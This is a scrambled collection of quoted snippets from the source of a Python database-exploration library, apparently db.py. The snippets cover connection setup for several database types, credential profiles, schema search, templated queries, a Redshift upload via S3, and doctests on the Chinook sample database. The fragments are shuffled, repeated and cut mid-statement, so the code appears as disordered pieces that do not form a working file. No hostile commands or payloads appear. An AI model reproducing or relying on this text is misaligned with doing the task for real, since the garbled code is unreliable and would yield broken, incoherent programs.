need to convert it to Postgres sql = sql.replace(\"[\",", "\"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\":", "those doctests to be viable... -= if not, there's always a random issue", "function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise", "[template(item) for item in data] query = [str(item) for item in query] if", "@staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return", "if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} >", "users with permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4())", "def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\")", "2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6", "str name for your shiny new table df: DataFrame data frame you want", "(i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on. defaults to", "except ImportError: raise Exception(\"Couldn't find boto library. 
Please ensure it is installed\") if", "= DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\",", "isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col),", "table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables", "None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY", "AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is", "self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb", "9 Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{ name", "----------- search: str glob pattern for what you're looking for data_type: str, list", "\"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for", "union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least", "columns. 
\"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes", "GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\")", ">>> from db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2)", "| Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER", "dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile is not", "find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for a column.", "| GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | |", "def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename", "Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast", "= \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit()", "of the Dawn 3 2 5 6 Put The Finger On You 1", "glob import gzip try: from StringIO import StringIO # Python 2.7 except: from", "{0}! 
Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB", "1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1", "# postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if", "try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\",", "to return Examples -------- >>> from db import DemoDB >>> db = DemoDB()", "\"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username =", "db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod", "defaults to using SQLite format. need to convert it to Postgres sql =", "9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds", "Album | AlbumId | INTEGER | | Album | ArtistId | INTEGER |", "from cache # 2. use a single query for getting all key relationships", "db import DemoDB >>> db = DemoDB() >>> q = ''' ... 
SELECT", "db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in self.tables: if", "tuples, to match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'],", "username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename", "| | Track | Milliseconds | INTEGER | | Track | GenreId |", ">>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f", "AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')", ".s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import", "defaultdict import pandas as pd import pybars from .column import Column, ColumnSet from", "mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB", "create the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE", "to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__))", "... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275", ". }} ... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}}", "[\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title", "passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. 
\"dw\", \"prod\")", "1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice", "which data type(s) you want to return Examples ---------- >>> from db import", "<NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>,", "like schema definitions. Most of you probably don't need this, but if you're", "sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in", "elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port", "0.99 4 Princess of the Dawn 0.99 5 Put The Finger On You", "table_name, ... COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP", "db drop_if_exists: bool (False) whether you'd like to drop the table if it", "script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\")", "keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif", "= profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self,", "self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data] query =", "205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834", "Album; ... 
''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data,", "pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC =", "__init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None,", "i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all", "import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates", "or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise", "[] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if", "<NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>,", "mssql: 1433 filename: str path to sqlite database dbname: str Name of the", "you'll have verrrrrrrry wide columns in some cases. driver: str, None Driver for", "\"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search", "= keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type not", "uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname =", "if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\")", "limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We", "Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99", "= 1433 elif profile is not None: pass else: raise Exception(\"Database type not", "----------- search: str glob pattern for what you're looking for Examples ---------- >>>", "Dirkscneider & W. 
Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051", "ones that fit into our framework), so we're going to create them. \"\"\"", "to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\")", "in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of", "not, there's always a random issue where rows are not in the same", "class DB(object): \"\"\" Utility for exploring and querying a database. Parameters ---------- username:", "GenreId | INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\"", "isinstance(data_type, str): data_type = [data_type] cols = [] for table in self.tables: for", "else: if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q)", "| | Artist | ArtistId | INTEGER | | Customer | SupportRepId |", "DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist.", "be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys to", ">>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3", "of records to return in a query. This is used by the DB.query", "NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") #", "... Album a ... INNER JOIN ... Track t ... on a.AlbumId =", "| Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer", "Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address |", "<NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U.", ">>> template = ''' ... SELECT ... 
'{{ name }}' as table_name, ...", "0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union,", "7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9", "template = ''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*)", "Salute You Name UnitPrice 0 For Those About To Rock (We Salute You)", ">>> db = DemoDB() >>> q = ''' ... SELECT ... a.Title, ...", "with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads =", "dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all", "tables(self): \"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\" if", "you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys", "encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks: t", "sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY", "<NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334", "limit: int Number of records to return Examples -------- >>> from db import", "IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from", "Column Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) |", "for what you're looking for Examples ---------- >>> from db import DemoDB >>>", "in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\"", "Invoice | CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) |", "Parameters ---------- username: str Your username for the database password: str Your password", "0.99 9 Evil Walks 0.99 
\"\"\" with open(filename) as fp: q = fp.read()", "| Track | MediaTypeId | INTEGER | | Track | GenreId | INTEGER", "INTEGER | | Track | Milliseconds | INTEGER | | Track | GenreId", "<NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>,", "import os import sys from collections import defaultdict import pandas as pd import", "0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item)", "You 1 1 2 Balls to the Wall 2 2 3 Restless and", "= TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())])", "... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt ...", "3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q =", "self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property", "data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those", "for refreshing schema # 1. load directly from cache # 2. use a", "6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q = ''' ...", "for all tables as list of tuples if told to use cached metadata", "database is running on. defaults to default port for db. portgres: 5432 redshift:", "if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname =", "self.driver = driver if self.dbtype is None: raise Exception(\"Database type not specified! 
Must", "hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del", "(\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False,", "'{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur", "self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str", "'s3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if", "metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in", "value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables,", "style.) keys_per_column: int, None Default number of keys to display in the foreign", "Those About To Rock We Salute You 8 For Those About To Rock", "exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\")", "cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name,", "mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname:", "Data will be passed to the template and rendered using handlebars. 
union: bool", ">>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results =", "= {} # generate our Columns, and attach to each table to the", "\"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q", "portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path", "in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db", "| CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER | |", "import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\",", "UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99", "sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it", "this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket", "HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility", "COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP BY ...", "[] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) #", "boto library. Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY", "chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk =", "always a random issue where rows are not in the same order, making", "Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have", "use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: #", "About To Rock We Salute You 1 Balls to the Wall 2 Restless", "& W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 
252051 4", ">>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q,", "it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY =", "import Location # if boto is present, set the bucket_location to default. #", "TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from", "Salute You 7 For Those About To Rock We Salute You 8 For", "foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column)", "\"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\":", "create the temporary transfer s3 bucket. This should match your redshift cluster's region.", "<NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U.", "{user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del", "<NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. 
Smith-Diesel 375418", "= os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None:", "files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy", "| NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\",", "import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId", "| | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) #", "\"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3:", "if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg", "= None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\":", "\"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q,", "whether you'd like to drop the table if it already exists chunk_size: int", "\"\"\" Lists all of the database profiles available Examples -------- No doctest, covered", "not exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e:", "f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all", "use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for", "The Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject", "a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... 
f.write(q)", "self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile)", "AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key. if this", "DB.query method. You can override it by adding limit={X} to the `query` method,", "find_table(self, search): \"\"\" Aggresively search through your database's schema for a table. Parameters", "of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more", "Princess of the Dawn 0.99 5 Put The Finger On You 0.99 6", "threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start()", "your environment variables AWS_SECRET_KEY: str your aws secrety key. if this is None,", "data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\")", "from S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL", "JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... 
''' >>> len(db.query(q))", "def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up to", "import gzip try: from StringIO import StringIO # Python 2.7 except: from io", "= password self.hostname = hostname self.port = port self.filename = filename self.dbname =", "| Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all", "df: DataFrame data frame you want to save to the db drop_if_exists: bool", "else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query)", "To Rock We Salute You 9 For Those About To Rock We Salute", "not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel", "\"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect(", "... 
''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About", "as pd import pybars from .column import Column, ColumnSet from .table import Table,", "MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack", "Let There Be Rock 1 4 5 Big Ones 3 \"\"\" if data:", "Number of records to return Examples -------- >>> from db import DemoDB >>>", "created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name} from", "as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def", "Shark 3 2 3 4 Restless and Wild 3 2 4 5 Princess", "a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f =", "select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if", "not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con", "False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE =", "_try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print", "sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and", "| INTEGER | | Employee | EmployeeId | INTEGER | | Genre |", "the database hostname: str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\")", "| | Employee | EmployeeId | INTEGER | | Genre | GenreId |", "limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database", "| Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type]", "threading import glob import gzip try: from StringIO import StringIO # Python 2.7", "cnt 0 Album 347 1 Artist 275 2 Track 3503 >>> q =", "using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. 
This will", "| | MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId |", "os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\":", "1 1 1 2 Balls to the Wall 2 2 2 3 Fast", "all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename", "\"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else: return q", "| Employee | EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70)", "= \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self,", "if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for", "viable... -= if not, there's always a random issue where rows are not", "load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port')", "Preconfigured database credentials / profile for how you like your queries exclude_system_tables: bool", "= [str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else:", "= [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ]", "... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f:", "+---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album | ArtistId |", "elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. 
Please ensure it", "Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor()", "and Wild 5 For Those About To Rock We Salute You 6 For", "\"\") # we'll create the table ONLY if it doens't exist sql =", "BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address", "| | Customer | CustomerId | INTEGER | | Employee | ReportsTo |", "[] table_meta = {} # pull out column metadata for all tables as", ".table import Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile,", "on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on. defaults", "| NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track |", "varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for", "cols): tables = {} # generate our Columns, and attach to each table", "Evil Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q,", "self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit", "db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\")", "prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results", "len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some", "... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... 
] >>> db.query(q,", "from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates", "if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name,", "Rock We Salute You 6 For Those About To Rock We Salute You", "data, but it will probably stop your little sister from stealing your passwords.", "| MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER | |", "Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute", "... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM", "port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE:", "to the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache)", "| Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address", "all key relationships # 3. use the naive approach if use_cache: # generate", "a database. Parameters ---------- username: str Your username for the database password: str", "This is used to control the rendering of PrettyTable a bit. None means", "ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit =", "username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur =", "3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for", "InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType", "an S3 object print_sql: bool (False) option for printing sql statement that will", "Bradley Cooper style.) 
